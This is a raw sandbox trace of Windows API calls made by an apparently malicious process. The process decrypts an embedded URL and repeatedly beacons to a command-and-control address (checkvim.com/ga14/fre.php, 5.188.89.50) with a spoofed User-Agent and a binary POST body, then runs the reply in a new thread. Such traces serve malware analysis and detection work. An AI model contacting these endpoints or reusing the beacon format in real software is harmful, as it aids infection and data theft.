0x76a90000 [0316.776] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86ff90) returned 1 [0316.792] GetProcessHeap () returned 0x840000 [0316.792] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0316.792] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0316.793] CryptImportKey (in: hProv=0x86ff90, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e9b0) returned 1 [0316.794] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0316.794] CryptSetKeyParam (hKey=0x87e9b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0316.795] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0316.795] CryptSetKeyParam (hKey=0x87e9b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0316.795] GetProcessHeap () returned 0x840000 [0316.795] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0316.796] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0316.797] CryptDecrypt (in: hKey=0x87e9b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fea8, pdwDataLen=0x19f9a4 | out: pbData=0x87fea8, pdwDataLen=0x19f9a4) returned 1 [0316.797] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0316.798] CryptDestroyKey (hKey=0x87e9b0) returned 1 [0316.799] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0316.799] CryptReleaseContext (hProv=0x86ff90, dwFlags=0x0) returned 1 [0316.799] GetProcessHeap () returned 0x840000 [0316.799] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0316.800] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0316.800] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0316.801] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0316.802] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0316.802] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0316.803] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0316.803] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0316.804] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0316.804] GetProcessHeap () returned 0x840000 [0316.804] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8712e0 [0316.804] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0316.804] GetProcessHeap () returned 0x840000 [0316.804] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8712e0 | out: hHeap=0x840000) returned 1 [0316.804] GetProcessHeap () returned 0x840000 [0316.804] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0316.804] GetProcessHeap () returned 0x840000 [0316.804] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fea8 | out: hHeap=0x840000) returned 1 [0316.804] GetProcessHeap () returned 0x840000 [0316.805] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fc20 [0316.805] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0316.806] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0316.811] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0316.812] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f8a8) returned 1 [0316.821] GetProcessHeap () returned 0x840000 [0316.821] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0316.822] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0316.822] CryptImportKey (in: hProv=0x86f8a8, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e930) returned 1 [0316.823] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0316.823] CryptSetKeyParam (hKey=0x87e930, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0316.824] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0316.824] CryptSetKeyParam (hKey=0x87e930, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0316.825] GetProcessHeap () returned 0x840000 [0316.825] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0316.825] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0316.826] CryptDecrypt (in: hKey=0x87e930, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fc20, pdwDataLen=0x19f9a4 | out: pbData=0x87fc20, pdwDataLen=0x19f9a4) returned 1 [0316.827] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0316.827] CryptDestroyKey (hKey=0x87e930) returned 1 [0316.828] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0316.828] CryptReleaseContext (hProv=0x86f8a8, dwFlags=0x0) returned 1 [0316.828] GetProcessHeap () returned 0x840000 [0316.828] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0316.829] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0316.829] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0316.830] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0316.831] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0316.832] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0316.832] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0316.832] GetProcessHeap () returned 0x840000 [0316.832] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871420 [0316.832] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871268*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789c8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0316.843] GetProcessHeap () returned 0x840000 [0316.843] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871bd8 [0316.843] socket (af=2, type=1, protocol=6) returned 0x558 [0316.844] connect (s=0x558, name=0x8789c8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0316.912] FreeAddrInfoW (pAddrInfo=0x871268*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789c8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0316.912] GetProcessHeap () returned 0x840000 [0316.912] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86fce8 [0316.912] GetProcessHeap () returned 0x840000 [0316.912] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8865c0 [0316.913] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0316.914] wvsprintfA (in: param_1=0x8865c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0316.914] GetProcessHeap () returned 0x840000 [0316.914] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0316.914] GetProcessHeap () returned 0x840000 [0316.914] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8865c0 | out: hHeap=0x840000) returned 1 [0316.914] GetProcessHeap () returned 0x840000 [0316.914] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fcb0 [0316.914] GetProcessHeap () returned 0x840000 [0316.914] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8865c0 [0316.915] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0316.916] wvsprintfA (in: param_1=0x8865c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0316.916] GetProcessHeap () returned 0x840000 [0316.916] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0316.916] GetProcessHeap () returned 0x840000 [0316.916] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8865c0 | out: hHeap=0x840000) returned 1 [0316.916] send (s=0x558, buf=0x873a58*, len=237, flags=0) returned 237 [0316.917] send (s=0x558, buf=0x87eb58*, len=159, flags=0) returned 159 [0316.917] GetProcessHeap () returned 0x840000 [0316.917] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0316.917] recv (in: s=0x558, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0317.275] GetProcessHeap () returned 0x840000 [0317.275] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0317.275] GetProcessHeap () returned 0x840000 [0317.275] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fcb0 | out: hHeap=0x840000) returned 1 [0317.276] GetProcessHeap () returned 0x840000 [0317.276] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0317.276] GetProcessHeap () returned 0x840000 [0317.276] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86fce8 | out: hHeap=0x840000) returned 1 [0317.276] closesocket (s=0x558) returned 0 [0317.276] GetProcessHeap () returned 0x840000 [0317.276] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871bd8 | out: hHeap=0x840000) returned 1 [0317.276] GetProcessHeap () returned 0x840000 [0317.276] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0317.276] GetProcessHeap () returned 0x840000 [0317.276] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fc20 | out: hHeap=0x840000) returned 1 [0317.276] GetProcessHeap () returned 0x840000 [0317.276] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871420 | out: hHeap=0x840000) returned 1 [0317.277] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0xec) returned 0x558 [0317.278] Sleep (dwMilliseconds=0xea60) [0317.280] GetProcessHeap () returned 0x840000 [0317.280] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f7e8 [0317.281] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0317.281] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0317.286] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0317.287] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86ff90) returned 1 [0317.293] GetProcessHeap () returned 0x840000 [0317.293] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0317.294] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0317.294] CryptImportKey (in: hProv=0x86ff90, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e970) returned 1 [0317.295] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0317.296] CryptSetKeyParam (hKey=0x87e970, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0317.296] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0317.297] CryptSetKeyParam (hKey=0x87e970, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0317.297] GetProcessHeap () returned 0x840000 [0317.297] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0317.298] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0317.298] CryptDecrypt (in: hKey=0x87e970, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f7e8, pdwDataLen=0x19f9a4 | out: pbData=0x87f7e8, pdwDataLen=0x19f9a4) returned 1 [0317.299] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0317.299] CryptDestroyKey (hKey=0x87e970) returned 1 [0317.300] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0317.300] CryptReleaseContext (hProv=0x86ff90, dwFlags=0x0) returned 1 [0317.300] GetProcessHeap () returned 0x840000 [0317.300] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0317.301] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0317.301] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0317.302] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0317.303] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0317.303] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0317.304] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0317.305] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0317.305] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0317.305] GetProcessHeap () returned 0x840000 [0317.305] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871128 [0317.305] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0317.305] GetProcessHeap () returned 0x840000 [0317.305] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871128 | out: hHeap=0x840000) returned 1 [0317.306] GetProcessHeap () returned 0x840000 [0317.306] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0317.306] GetProcessHeap () returned 0x840000 [0317.306] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f7e8 | out: hHeap=0x840000) returned 1 [0317.306] GetProcessHeap () returned 0x840000 [0317.306] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fea8 [0317.306] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0317.307] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0317.312] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0317.313] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fa40) returned 1 [0317.320] GetProcessHeap () returned 0x840000 [0317.320] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0317.321] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0317.321] CryptImportKey (in: hProv=0x86fa40, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e4f0) returned 1 [0317.322] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0317.323] CryptSetKeyParam (hKey=0x87e4f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0317.323] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0317.324] CryptSetKeyParam (hKey=0x87e4f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0317.324] GetProcessHeap () returned 0x840000 [0317.324] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0317.325] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0317.325] CryptDecrypt (in: hKey=0x87e4f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fea8, pdwDataLen=0x19f9a4 | out: pbData=0x87fea8, pdwDataLen=0x19f9a4) returned 1 [0317.326] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0317.326] CryptDestroyKey (hKey=0x87e4f0) returned 1 [0317.326] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0317.327] CryptReleaseContext (hProv=0x86fa40, dwFlags=0x0) returned 1 [0317.327] GetProcessHeap () returned 0x840000 [0317.327] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0317.327] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0317.328] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0317.328] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0317.329] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0317.329] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0317.330] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0317.330] GetProcessHeap () returned 0x840000 [0317.330] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871128 [0317.330] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871470*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c80*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0317.332] GetProcessHeap () returned 0x840000 [0317.332] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871ba8 [0317.332] socket (af=2, type=1, protocol=6) returned 0x55c [0317.332] connect (s=0x55c, name=0x878c80*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0317.406] FreeAddrInfoW (pAddrInfo=0x871470*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c80*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0317.406] GetProcessHeap () returned 0x840000 [0317.406] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f248 [0317.406] GetProcessHeap () returned 0x840000 [0317.406] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8865c0 [0317.407] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0317.408] wvsprintfA (in: param_1=0x8865c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0317.408] GetProcessHeap () returned 0x840000 [0317.408] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0317.408] GetProcessHeap () returned 0x840000 [0317.408] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8865c0 | out: hHeap=0x840000) returned 1 [0317.408] GetProcessHeap () returned 0x840000 [0317.408] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f7a0 [0317.408] GetProcessHeap () returned 0x840000 [0317.408] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8865c0 [0317.409] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0317.410] wvsprintfA (in: param_1=0x8865c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0317.410] GetProcessHeap () returned 0x840000 [0317.410] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0317.410] GetProcessHeap () returned 0x840000 [0317.410] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8865c0 | out: hHeap=0x840000) returned 1 [0317.410] send (s=0x55c, buf=0x873a58*, len=237, flags=0) returned 237 [0317.411] send (s=0x55c, buf=0x87eb58*, len=159, flags=0) returned 159 [0317.411] GetProcessHeap () returned 0x840000 [0317.411] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0317.411] recv (in: s=0x55c, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0317.801] GetProcessHeap () returned 0x840000 [0317.801] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0317.801] GetProcessHeap () returned 0x840000 [0317.801] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f7a0 | out: hHeap=0x840000) returned 1 [0317.801] GetProcessHeap () returned 0x840000 [0317.801] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0317.801] GetProcessHeap () returned 0x840000 [0317.801] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f248 | out: hHeap=0x840000) returned 1 [0317.801] closesocket (s=0x55c) returned 0 [0317.802] GetProcessHeap () returned 0x840000 [0317.802] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871ba8 | out: hHeap=0x840000) returned 1 [0317.802] GetProcessHeap () returned 0x840000 [0317.802] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0317.802] GetProcessHeap () returned 0x840000 [0317.802] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fea8 | out: hHeap=0x840000) returned 1 [0317.802] GetProcessHeap () returned 0x840000 [0317.802] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871128 | out: hHeap=0x840000) returned 1 [0317.802] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x884) returned 0x55c [0317.804] Sleep (dwMilliseconds=0xea60) [0317.806] GetProcessHeap () returned 0x840000 [0317.806] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f998 [0317.806] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0317.807] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0317.822] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0317.822] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x870128) returned 1 [0317.831] GetProcessHeap () returned 0x840000 [0317.831] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0317.832] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0317.832] CryptImportKey (in: hProv=0x870128, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e430) returned 1 [0317.833] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0317.833] CryptSetKeyParam (hKey=0x87e430, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0317.834] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0317.911] CryptSetKeyParam (hKey=0x87e430, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0317.911] GetProcessHeap () returned 0x840000 [0317.911] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0317.912] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0317.912] CryptDecrypt (in: hKey=0x87e430, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f998, pdwDataLen=0x19f9a4 | out: pbData=0x87f998, pdwDataLen=0x19f9a4) returned 1 [0317.913] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0317.914] CryptDestroyKey (hKey=0x87e430) returned 1 [0317.914] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0317.915] CryptReleaseContext (hProv=0x870128, dwFlags=0x0) returned 1 [0317.915] GetProcessHeap () returned 0x840000 [0317.915] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) 